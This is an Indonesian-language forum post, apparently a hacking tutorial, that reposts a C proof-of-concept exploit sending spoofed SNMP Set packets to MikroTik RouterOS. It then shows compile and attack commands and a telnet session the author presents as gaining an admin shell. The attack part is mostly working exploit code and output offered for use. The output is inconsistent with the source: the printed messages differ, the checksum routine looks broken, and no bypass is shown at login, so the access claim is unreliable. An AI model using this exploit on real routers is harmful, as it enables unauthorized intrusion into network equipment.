[adv exploiting tutorial] gaining access Mikrotik 2.9.51 (2.9.x branch), 3.13 yg enable SNMP
om momod nebeng mindahin tutor2 gw yg diforum laen kesini ya..hehe,
ini tutor buat gaining access ke shell mikrotik, dah lm bgt gw tulis di forum2 underground tetangga..
ni source cm jln di unix ya.. berhubung headerny <sys/socket>, kaga pake <winsock>
Code:
/* --------------------------------------------------------------------------
* (c) ShadOS 2008
* _ _ _ _ _ __ _ _ _
* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-<
* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
* hellknights.void.ru |___/ .0x48k.
*
* --------------------------------------------------------------------------
*
* Title: MicroTik RouterOS <=3.13 SNMP write (Set request) PoC exploit.
*
* Vendor: www.mikrotik.com
*
* Vulnerable versions: 2.9.51 (2.9.x branch), 3.13 (3.x branch)
* (prior versions also affected).
*
* Funded: 03.09.2008 by ShadOS (http://hellknights.void.ru)
*
* Let's see the manual:
* http://www.mikrotik.com/testdocs/ros/2.9/root/snmp_content.php
*
*
*
Quote:
*
* > SNMP Service
* >
* > General Information
* >
* > Summary
* >
* > ... RouterOS supports only Get, which means that you can use this implementation only for network monitoring.
* >
* >
* > The MikroTik RouterOS supports:
* >
* > SNMPv1 only
* > Read-only access is provided to the NMS (network management system)
* > User defined communities are supported
* > Get and GetNext actions
* > No Set support
* > No Trap support
* >
*
*
*
*
*
* Don't forget to visit our site and my homepage for new releases:
* http://hellknights.void.ru
* http://shados.freeweb7.com
* Also, you can mail me any bugs or suggestions:
* mailto: shados /at/ mail /dot/ ru
*
* Thanks 2 cih.ms and all my friends.
* --------------------------------------------------------------------------
*
* Copyright (C) 89, 90, 91, 1995-2008 Free Software Foundation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*
* --------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <memory.h>
#include <string.h>
unsigned char evilcode[49] = {
0x33, 0x02, 0x01, 0x02, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x18, 0x30, 0x16, 0x06, 0x08,
0x2B, 0x06, 0x01, 0x02, 0x01, 0x01, 0x05, 0x00, 0x04, 0x17, 0x57, 0x72, 0x69, 0x74, 0x65, 0x20,
0x69, 0x73, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x73, 0x75, 0x70, 0x70, 0x6F, 0x72, 0x74, 0x65, 0x64,
0x21
};
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 17) + (sum & 0xffff);
sum += (sum >> 17);
answer = -sum;
return (answer);
}
int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
{
char *packet;
struct sockaddr_in dstaddr;
struct iphdr *ip;
struct udphdr *udp;
packet = (char *)malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + len);
memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
if (packet == NULL) { printf("Malloc failed\n"); exit(-1); }
ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet+sizeof(struct iphdr));
ip->saddr = *saddr;
ip->daddr = *daddr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255;
ip->id = htons((unsigned short) rand());
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
ip->check = in_cksum(ip, sizeof(struct iphdr));
udp->source = htons(sport);
udp->dest = htons(dport);
udp->len = htons(sizeof(struct udphdr) + len);
memcpy(packet + (sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
dstaddr.sin_family = AF_INET;
dstaddr.sin_addr.s_addr = *daddr;
if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
perror("sendto() failed");
free(packet);
}
char * makereq(char *community,int *size)
{
char *buf;
char *ptr;
int len;
int i;
len = 7 + strlen(community) + sizeof(evilcode);
buf = (char *)malloc(len);
ptr = buf;
*ptr++ = 0x30;
*ptr++ = len;
/* Snmp Version */
*ptr++ = 0x02;
*ptr++ = 0x01;
*ptr++ = 0x00;
/* Community */
*ptr++ = 0x04;
*ptr++ = strlen(community);
strcpy(ptr,community);
ptr = ptr + strlen(community);
*ptr++ = 0xA3; /* Set Request */
memcpy(ptr, evilcode, sizeof(evilcode));
ptr = ptr + sizeof(evilcode);
*size = len+1;
return buf;
}
int erexit(char *msg)
{
printf("%s\n",msg);
exit (-1) ;
}
int usage()
{
printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
}
int main(int argc, char **argv)
{
char *saddr,*daddr,*community;
unsigned char *buf;
int size;
int sock;
unsigned long lsaddr,ldaddr;
int i;
saddr = NULL;
daddr = NULL;
if (argc != 7) { usage(); erexit("not enough args\n"); }
if (!strcmp(argv[1],"-s"))
saddr = strdup(argv[2]);
if (!strcmp(argv[3],"-d"))
daddr = strdup(argv[4]);
if (!strcmp(argv[5],"-c"))
community = strdup(argv[6]);
printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);
if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
erexit("Invalid source/destination IP address\n");
if (saddr == NULL) { usage(); erexit("No Source Address"); }
if (daddr == NULL) { usage(); erexit("No Dest Address"); }
sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
if (sock == -1)
erexit("Couldnt open Raw socket!(Are you root?)\n");
lsaddr = inet_addr(saddr);
ldaddr = inet_addr(daddr);
buf = makereq(community,&size);
printf("Sending %d bytes buffer:\n",size);
for (i=0;i<size;i++)
printf("0x%02x ",buf[i]);
printf("\n");
sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
fprintf(stdout,"Sent packet. \"/system identity\" must be changed.\n");
return 0;
}
// milw0rm.com [2008-09-05]
compile source C diatas dgn gcc anda
Code:
me@di3:~> gcc -o mtcrash mt.c
me@di3:~>
jika konfigurasi mikrotik target dibuat seperti ini oleh admin : (disini vulnernya)
Code:
[i][admin@MikroTik] /snmp> /snmp set enabled=yes
[admin@MikroTik] /snmp> / snmp community set public name="public" address=192.168.1.0/24 read-access=yes
[admin@MikroTik] /snmp> print
enabled: yes
contact: ""
location: ""
engine-id: ""
engine-boots: 0
time-window: 15
trap-sink: 0.0.0.0
trap-community: (unknown)
trap-version: 1
dan kita tes snmp server target dgn perintah :
Code:
me@di3:~> snmpwalk -v1 -cpublic 192.168.1.2
SNMPv2-MIB::sysDescr.0 = STRING: router
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.14988.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (2297300) 6:22:53.00
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: MikroTik
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 78
IF-MIB::ifNumber.0 = INTEGER: 2
IF-MIB::ifIndex.1 = INTEGER: 1
IF-MIB::ifIndex.2 = INTEGER: 2
IF-MIB::ifDescr.1 = STRING: ether1
report diatas mengindikasikan snmp service di server aktif dgn publicname=public
maka kita bisa exploitasi dgn source yg sy kasih diatas sebelumny sbb:
Code:
me@di3:~> su -c "./mtcrash -s 192.168.1.5 -d 192.168.1.2 -c public"
Password:
Ok, spoofing packets from 192.168.1.5 to 192.168.1.2
Sent packet. SNMPd must be down.
me@di3:~> snmpwalk -v1 -cpublic 192.168.1.2
me@di3:~> ping -n 192.168.1.2
PING 192.168.1.2 (10.0.2.163) 56(84) bytes of data.
64 bytes from 192.168.1.2: icmp_seq=1 ttl=62 time=49.7 ms
64 bytes from 192.168.1.2: icmp_seq=2 ttl=62 time=28.4 ms
--- 192.168.1.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 28.413/39.066/49.719/10.653 ms
me@di3:~> telnet 192.168.1.2 //lakukan kembali koneksi lwt telnet
Trying 192.168.1.2...
Connected to 192.168.1.2
Escape character is '^]'.
MikroTik v3.2
Login: admin
Password:
MMM MMM KKK TTTTTTTTTTT KKK
MMMM MMMM KKK TTTTTTTTTTT KKK
MMM MMMM MMM III KKK KKK RRRRRR OOOOOO TTT III KKK KKK
MMM MM MMM III KKKKK RRR RRR OOO OOO TTT III KKKKK
MMM MMM III KKK KKK RRRRRR OOO OOO TTT III KKK KKK
MMM MMM III KKK KKK RRR RRR OOOOOO TTT III KKK KKK
MikroTik RouterOS 3.2 (c) 1999-2008 http://www.mikrotik.com/
Property of Midcoast Internet Solutions 2075948277 or http://www.midcoast.com
Unauthorized access will be prosecuted.
All Access is logged.
[admin@MikroTik] > sys res print //bang!..
bad command name res (line 1 column 5)
[admin@MikroTik] > /system resource print
uptime: 6h25m34s
version: "3.2"
free-memory: 3456kB
total-memory: 13964kB
cpu: "MIPS 4Kc V0.11"
cpu-count: 1
cpu-frequency: 175MHz
cpu-load: 100
free-hdd-space: 33696kB
total-hdd-space: 61440kB
write-sect-since-reboot: 513
write-sect-total: 197504
bad-blocks: 0
[admin@MikroTik] >
dor.. dapet deh admin shellnya..
by:bl00d13z a.k.a b1n4ry_g33k5/c0mrade